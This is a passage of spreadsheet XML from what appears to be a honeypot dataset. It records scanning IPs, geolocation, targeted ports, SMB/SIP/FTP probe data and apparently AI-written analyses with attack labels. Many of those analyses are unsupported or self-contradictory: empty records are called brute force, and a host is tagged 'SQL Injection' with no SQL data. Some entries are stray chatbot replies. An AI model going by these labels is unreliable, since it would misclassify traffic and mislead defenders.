(,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53609)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53681)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52721)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,60064)}</t>
  </si>
  <si>
    <t>::ffff:c08c:4024</t>
  </si>
  <si>
    <t>An incoming network connection to a shared resource has been detected from an unknown IP address suggesting potential unauthorized access attempts. The IP address and port number involved indicate the source of the connection. This may be related to a brute force attack or unauthorized data transfer. &amp;&amp; An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources. This could be an attempt to exploit vulnerabilities or exfiltrate sensitive information. The source IP is attempting to connect to a network service that may not be publicly exposed. &amp;&amp; An incoming connection from an unknown IP address to a shared resource is suspicious.
This could be an attempt to access files or steal sensitive information without authorization.
Possible malware or unauthorized user trying to breach system security. &amp;&amp; An incoming connection from an external IP address is attempting to access the system using SMB protocol, which could be a potential attempt at unauthorized file sharing or data exfiltration.
This activity may indicate a malicious actor trying to exploit vulnerabilities in the system's file sharing capabilities.
It could also be part of a larger attack to gain unauthorized access to sensitive information. &amp;&amp; There is insufficient information to analyze potential malicious activity. The absence of log data makes it impossible to identify or describe any possible malicious actions. &amp;&amp; An incoming connection is being made to a shared resource from an IP address that may be malicious. This could indicate an attempt to access or exploit the system's file sharing capabilities. Potential unauthorized access is occurring through SMB. &amp;&amp; This indicates an incoming connection from IP address 192.140.64.36 to the SMB service, which could be a sign of malicious activity attempting to access or exploit this service. The IP is attempting unauthorized access to shared resources. This may be part of a larger attempt to breach network security. &amp;&amp; No log data provided, cannot analyze activity.
However, if you provide the actual log data I can assist with analyzing it for possible malicious activities.</t>
  </si>
  <si>
    <t>SMB Portscan &amp;&amp; SMB Scanning &amp;&amp; I don't see any log data provided to analyze. Please provide the actual log data, and I'll be happy to assist you with identifying the type of attack.</t>
  </si>
  <si>
    <t>262ba4fce036bdf8548e30d606d4fdcd</t>
  </si>
  <si>
    <t>139.162.119.196</t>
  </si>
  <si>
    <t>prod56client01.academyforinternetresearch.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>21&amp;&amp;23&amp;&amp;8443&amp;&amp;1433&amp;&amp;143&amp;&amp;110&amp;&amp;3306&amp;&amp;443&amp;&amp;3389&amp;&amp;25</t>
  </si>
  <si>
    <t>Shibuya</t>
  </si>
  <si>
    <t>11808021</t>
  </si>
  <si>
    <t>150-0000</t>
  </si>
  <si>
    <t>35.6764</t>
  </si>
  <si>
    <t>139.65</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;login</t>
  </si>
  <si>
    <t>{Data_FTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Host': 'vm2448896.stark-industries.solutions', 'User-Agent': 'Mozilla/5.0 (Linux; Android 8; SM-G150NL; Build/OPM1.180203.72) AppleWebKit/537.36 (KHTML', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IMAP:NA}</t>
  </si>
  <si>
    <t>::ffff:8ba2:77c4</t>
  </si>
  <si>
    <t>No malicious activity detected for TELNET service. No incoming or outgoing connections recorded. Service status remains unchanged. &amp;&amp; No FTP login attempt detected, but this may indicate an attempted brute-force attack to gain unauthorized access. The lack of any successful login attempts suggests the activity was likely malicious in nature. This could be part of a reconnaissance phase or probing for vulnerabilities. &amp;&amp; This suggests a failed attempt to access or connect to an RDP service, potentially malicious in nature as it may be an unauthorized login attempt. The fact that the connection was unsuccessful could mean the attacker's credentials were incorrect or the system blocked the attack. This activity indicates potential unauthorized access attempts. &amp;&amp; No activity detected for IMAP service, indicating possible absence of malicious connection attempts. 
IMAP service remains inactive which may be indicative of no malicious probing or scanning. 
This suggests the service is not being actively targeted by attackers at this time. &amp;&amp; No activity reported for Microsoft SQL Server. No login attempts or connections detected. Normal operation assumed if no events triggered by the system. &amp;&amp; The system detected an unknown or unexpected command being executed, possibly indicating malicious or automated activity. This could be related to exploiting a vulnerability or attempting unauthorized access. No valid command or function was recognized. &amp;&amp; Unknown service attempted to interact with PJL, which is an uncommon printer protocol suggesting potentially malicious activity. This may indicate a brute force attack or exploitation of a vulnerability. Interaction with this protocol is often indicative of malware or scanner behavior. &amp;&amp; Possible brute force attempt on POP3 service as "Data" is marked as unknown or unavailable which could indicate an invalid login attempt. Unknown credentials were used to try and access the service. Service may be targeted for password cracking. &amp;&amp; This log indicates an empty FTP command, which could be a reconnaissance attempt to identify available commands or services. It might also suggest a scanning activity trying to gather information about the system's vulnerabilities. This could potentially be a precursor to further malicious actions. &amp;&amp; This indicates an attempt to execute an FTP command without specifying any arguments or commands, which could be a reconnaissance probe or part of a larger malicious attack to scan the system for vulnerabilities. The lack of specific action suggests a preparatory phase or a scan to gather information. This behavior is unusual and potentially suspicious. &amp;&amp; Unknown activity detected for SMTP service, possibly due to lack of traffic or data. No specific malicious behavior is indicated by this log entry. Further investigation is required to determine the cause of this situation. &amp;&amp; The data indicates that a MySQL-related activity was detected, but it's unclear if it's legitimate or malicious due to lack of information. A potential scan or attempted access occurred. The specific details are unknown as no further information is provided. &amp;&amp; Attempted access to IMAP service, possibly for email account compromise or password cracking efforts.</t>
  </si>
  <si>
    <t>SQL Injection &amp;&amp; FTP Attack &amp;&amp; Telnet Scanning &amp;&amp; FTP Attack</t>
  </si>
  <si>
    <t>6158369601beba7f985750178aedc881</t>
  </si>
  <si>
    <t>59.183.146.228</t>
  </si>
  <si>
    <t>::ffff:3bb7:92e4</t>
  </si>
  <si>
    <t>No TELNET login attempt made. No malicious activity detected related to TELNET service access. Service not accessed or interacted with via TELNET connection. &amp;&amp; This data indicates an attempted connection to a Telnet service without any actual communication or activity, suggesting a probing or reconnaissance attempt by a malicious actor. The lack of further data suggests the attempt was likely unsuccessful or abandoned. This could be indicative of a scanning activity to identify potential vulnerabilities.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Telnet Scan</t>
  </si>
  <si>
    <t>e782ecc991b280e4b509db1a7cf70c7c</t>
  </si>
  <si>
    <t>117.212.55.93</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:75d4:375d</t>
  </si>
  <si>
    <t>4a037bf7acd7ce5c83bb5bbbe26f8db7</t>
  </si>
  <si>
    <t>117.214.63.237</t>
  </si>
  <si>
    <t>::ffff:75d6:3fed</t>
  </si>
  <si>
    <t>101927bef7713c0f4402a067f2b89f9f</t>
  </si>
  <si>
    <t>165.154.120.30</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_FTP_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;21&amp;&amp;443&amp;&amp;8443&amp;&amp;1080&amp;&amp;NA&amp;&amp;37628&amp;&amp;6379&amp;&amp;445&amp;&amp;40380&amp;&amp;5432&amp;&amp;49874&amp;&amp;44704&amp;&amp;23&amp;&amp;389&amp;&amp;6667&amp;&amp;47467</t>
  </si>
  <si>
    <t>command&amp;&amp;NA&amp;&amp;connection&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.120.30,58254)}&amp;&amp;{Data_SMB:Incoming connection (165.154.120.30,46700)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=60391'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=59650'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=41848'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=51909'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:a59a:781e</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze any activity. &amp;&amp; No data provided for analysis. &amp;&amp; Potential malicious activity detected involving a failed attempt to utilize SOCKS5 protocol for unauthorized access.
This may indicate an attacker trying to bypass security measures using proxy servers, but was unable to connect.
The presence of 'NA' suggests that the SOCKS5 connection attempt failed or was not completed. &amp;&amp; No log data provided, unable to analyze activity.</t>
  </si>
  <si>
    <t>c4ecfe080506731bc324871241b8a38e</t>
  </si>
  <si>
    <t>207.178.215.218</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;43985&amp;&amp;NA</t>
  </si>
  <si>
    <t>Agoura Hills</t>
  </si>
  <si>
    <t>5322553</t>
  </si>
  <si>
    <t>91301</t>
  </si>
  <si>
    <t>34.146</t>
  </si>
  <si>
    <t>-118.777</t>
  </si>
  <si>
    <t>5033</t>
  </si>
  <si>
    <t>Key Information Systems, Inc.</t>
  </si>
  <si>
    <t>1996-08-17</t>
  </si>
  <si>
    <t>ISWEST-BLK-1</t>
  </si>
  <si>
    <t>2014-09-24</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63515)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63101)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62669)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63520)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62583)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62136)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63782)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63369)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63733)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62797)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63617)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62133)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62616)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62635)}</t>
  </si>
  <si>
    <t>::ffff:cfb2:d7da</t>
  </si>
  <si>
    <t>Unauthorized access attempt via file sharing service.
 User attempted to authenticate with SMB credentials.
Possible reconnaissance or initial step in malware spread. &amp;&amp; Malicious activity detected: A potential SMB authentication attempt was made to a vulnerable service, possibly an attempt to gain unauthorized access or exploit the system. This could be an indication of a targeted attack on a specific system or network. An attacker may try to use this as a foothold for further malicious activities. &amp;&amp; Malicious attempt to authenticate using SMB protocol, possibly an exploitation of unpatched vulnerability or part of brute-force attack sequence, targeting sensitive network resources for unauthorized access. The authentication message suggests the attacker is trying to establish a connection to a system with specific credentials, which could be used for further malicious activities. This behavior may indicate a potential security breach or intrusion attempt.</t>
  </si>
  <si>
    <t>SMB Brute Force &amp;&amp; SMB Brute</t>
  </si>
  <si>
    <t>1856d9bcd855aa23e5fbe982ef74a72f</t>
  </si>
  <si>
    <t>120.57.209.144</t>
  </si>
  <si>
    <t>::ffff:7839:d190</t>
  </si>
  <si>
    <t>Telnet service connection attempt was made but no activity occurred as indicated by "NA". This suggests a failed or reconnaissance attempt to access the system. It could be a scan for vulnerable services. &amp;&amp; No TELNET activity detected. This indicates that no malicious attempts were made through this service. No login or communication occurred via TELNET protocol.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Scanning Attempt</t>
  </si>
  <si>
    <t>e2ea5f661a4f3d5c01c9f3d698088bfa</t>
  </si>
  <si>
    <t>117.214.76.4</t>
  </si>
  <si>
    <t>::ffff:75d6:4c04</t>
  </si>
  <si>
    <t>eb408b11705e91099aec8369390e2e56</t>
  </si>
  <si>
    <t>194.114.136.101</t>
  </si>
  <si>
    <t>Osaka-shi</t>
  </si>
  <si>
    <t>1853909</t>
  </si>
  <si>
    <t>540-0002</t>
  </si>
  <si>
    <t>34.6937</t>
  </si>
  <si>
    <t>135.502</t>
  </si>
  <si>
    <t>23959</t>
  </si>
  <si>
    <t>OWL-AS-AP</t>
  </si>
  <si>
    <t>Owl Limited</t>
  </si>
  <si>
    <t>::ffff:c272:8865</t>
  </si>
  <si>
    <t>ef7f4aa5647da47902dc69f4baea2515</t>
  </si>
  <si>
    <t>49.131.52.171</t>
  </si>
  <si>
    <t>KKC</t>
  </si>
  <si>
    <t>Kowloon City</t>
  </si>
  <si>
    <t>1819609</t>
  </si>
  <si>
    <t>22.3144</t>
  </si>
  <si>
    <t>114.22</t>
  </si>
  <si>
    <t>17924</t>
  </si>
  <si>
    <t>SMARTONE-MB-AS-AP</t>
  </si>
  <si>
    <t>Smartone Mobile communications Limited</t>
  </si>
  <si>
    <t>::ffff:3183:34ab</t>
  </si>
  <si>
    <t>cd1e6710387201f349a013b795c2c752</t>
  </si>
  <si>
    <t>96.126.123.21</t>
  </si>
  <si>
    <t>prod-boron-us-central-5.li.binaryedge.ninja&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>3306&amp;&amp;NA&amp;&amp;21&amp;&amp;143&amp;&amp;5900</t>
  </si>
  <si>
    <t>Richardson</t>
  </si>
  <si>
    <t>4722625</t>
  </si>
  <si>
    <t>75080</t>
  </si>
  <si>
    <t>32.9483</t>
  </si>
  <si>
    <t>-96.7299</t>
  </si>
  <si>
    <t>2011-05-06</t>
  </si>
  <si>
    <t>LINODE-US</t>
  </si>
  <si>
    <t>2023-09-18</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>2015-04-10 13:57:21</t>
  </si>
  <si>
    <t>2026-04-10 13:57:21</t>
  </si>
  <si>
    <t>2025-03-16 04:02:41</t>
  </si>
  <si>
    <t>['amir.ns.cloudflare.com', 'ines.ns.cloudflare.com']</t>
  </si>
  <si>
    <t>Cloudflare, Inc</t>
  </si>
  <si>
    <t>REDACTED</t>
  </si>
  <si>
    <t>registrar-notices@cloudflare.com</t>
  </si>
  <si>
    <t>::ffff:607e:7b15</t>
  </si>
  <si>
    <t>233aafa5b03cbf48a8dfe1cbee768021</t>
  </si>
  <si>
    <t>121.147.220.27</t>
  </si>
  <si>
    <t>Songjeong-dong</t>
  </si>
  <si>
    <t>1836169</t>
  </si>
  <si>
    <t>506010</t>
  </si>
  <si>
    <t>35.136</t>
  </si>
  <si>
    <t>126.799</t>
  </si>
  <si>
    <t>::ffff:7993:dc1b</t>
  </si>
  <si>
    <t>This log indicates that there was an attempt to connect to the TELNET service, but it failed as indicated by NA (not applicable or no activity). This could be a failed brute force login attempt or simply a user trying to access a non-existent service. No meaningful activity occurred with this connection attempt. &amp;&amp; No TELNET activity detected, but this could indicate that the malicious actor is using a different service or protocol to gain access to the system, potentially indicating an attempt to exploit a vulnerability or launch a targeted attack. 
This lack of activity might also suggest that the attacker is using a stealthy approach, trying to remain undetected by avoiding typical detection methods. 
The absence of TELNET activity could be a red flag for more sophisticated or covert malicious behavior.</t>
  </si>
  <si>
    <t>eb9f3590d08abd24db1228fd46cf0d07</t>
  </si>
  <si>
    <t>167.94.138.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SIP_H3&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_IPP_H30&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_IPP_H19&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_IPP_H26&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_IPP_H4&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_RDP_H32&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_MYSQL_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;25&amp;&amp;20509&amp;&amp;80&amp;&amp;143&amp;&amp;443&amp;&amp;23&amp;&amp;110&amp;&amp;389&amp;&amp;21&amp;&amp;1433&amp;&amp;5432&amp;&amp;631&amp;&amp;6667&amp;&amp;1521&amp;&amp;6379&amp;&amp;1080&amp;&amp;8443&amp;&amp;3389&amp;&amp;5900&amp;&amp;445&amp;&amp;36428&amp;&amp;3306&amp;&amp;59214&amp;&amp;45218&amp;&amp;9100&amp;&amp;48380&amp;&amp;39438&amp;&amp;39454&amp;&amp;55960&amp;&amp;42646&amp;&amp;42654</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA&amp;&amp;request&amp;&amp;stshash&amp;&amp;command&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': 